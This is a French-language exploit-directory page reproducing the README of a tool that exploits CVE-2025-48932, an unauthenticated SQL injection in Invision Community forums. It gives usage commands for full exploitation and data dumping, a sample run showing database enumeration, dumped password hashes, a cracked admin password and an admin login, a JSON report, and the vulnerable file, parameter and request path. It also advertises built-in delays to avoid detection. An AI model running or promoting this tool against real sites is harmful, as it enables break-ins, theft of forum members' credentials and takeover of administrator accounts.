Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 - Exploit d'injection SQL non authentifiée pour Invision Community ≤ 4.7.20. Exploitation entièrement automatisée avec énumération de base de données, extraction d'identifiants, prise de contrôle administrateur, détournement de session et multi-threading. Aucune dépendance requise. Outil de recherche en sécurité par Sudeepa Wanigarathna | Kitploit
Outils/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
Attaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesCollecte d'InformationsPost-ExploitationSécurité WebTests d'Intrusion

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

CVE-2025-48932 - Exploit d'injection SQL non authentifiée pour Invision Community ≤ 4.7.20. Exploitation entièrement automatisée avec énumération de base de données, extraction d'identifiants, prise de contrôle administrateur, détournement de session et multi-threading. Aucune dépendance requise. Outil de recherche en sécurité par Sudeepa Wanigarathna

GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

Voir le dépôt
117il y a 1 moisPas encore vérifié
Partager

🔓 CVE-2025-48932 - Exploitation d'injection SQL dans Invision Community

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ Aperçu de la vulnérabilité critique

CVE-2025-48932 est une vulnérabilité critique d'injection SQL aveugle non authentifiée découverte dans Invision Community versions ≤ 4.7.20. Cet exploit permet aux attaquants distants de :

  • 🔍 Extraire des informations sensibles de la base de données
  • 👤 Voler les identifiants utilisateurs et les hachages de mots de passe
  • 🔑 Prendre le contrôle des comptes administrateur
  • 🎯 Détourner les sessions utilisateur actives
  • 💻 Obtenir une exécution de code à distance (RCE) via la prise de contrôle du compte admin
  • 📊 Extraire l'intégralité du contenu de la base de données

🎯 Fonctionnalités

FonctionnalitéDescriptionStatut
🚀 Zéro dépendanceBibliothèque standard Python pure - aucune installation pip requise✅
⚡ MultithreadéExtraction de données ultra-rapide avec threads configurables✅
🤖 Entièrement automatiséChaîne d'exploitation complète, de la détection au rapport✅
👑 Prise de contrôle adminDétournement de session et élévation de privilèges✅
🔑 Extraction d'identifiantsExtraire les utilisateurs, les hachages de mots de passe, les e-mails✅
🔓 Cassage de mots de passeCassage de hachages intégré avec prise en charge des wordlists✅
📋 Rapports JSONSortie structurée pour l'analyse et la documentation✅
🔌 Prise en charge des proxysIntégration Burp Suite et proxy personnalisé✅
🎨 Sortie coloréeSortie terminal élégante avec indicateurs de progression✅
🛡️ Limitation de débitDélais intégrés pour éviter la détection✅

📊 Démo et captures d'écran

Exécution de l'exploit

$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

Exemple de sortie JSON

{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 Guide de démarrage rapide

Installation

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# No dependencies to install! Just run it.

Utilisation de base

# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only

# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v

# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# Save results to custom file
python3 exploit.py -u https://example.com -o results.json

# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10

# Dump all available data
python3 exploit.py -u https://example.com --dump-all

Utilisation avancée

# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json

# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug

📋 Prérequis

Configuration système requise

  • Python : 3.6 ou supérieur
  • OS : Linux, Windows, macOS (tout OS avec Python)
  • Mémoire : Minimale (~50 Mo de RAM)
  • Stockage : ~100 Ko (exploit uniquement)

Dépendances

✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!

Optionnel (pour le cassage de mots de passe)

  • Wordlist : rockyou.txt ou toute wordlist personnalisée
    # Download popular wordlist
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ Détails techniques

Emplacement de la vulnérabilité

  • Fichier : /applications/calendar/modules/front/calendar/view.php
  • Méthode : IPS\calendar\modules\front\calendar\view::search()
  • Paramètre : location (entrée fournie par l'utilisateur)
  • Type : Injection SQL aveugle basée sur des booléens

Vecteur d'attaque

GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]
Télécharger l’outil